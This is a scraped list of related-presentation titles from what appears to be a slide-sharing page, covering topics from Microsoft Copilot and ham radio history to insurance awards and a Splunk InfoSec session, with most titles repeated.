Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of Brazil
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 

Splunk Enterprise for InfoSec Hands-On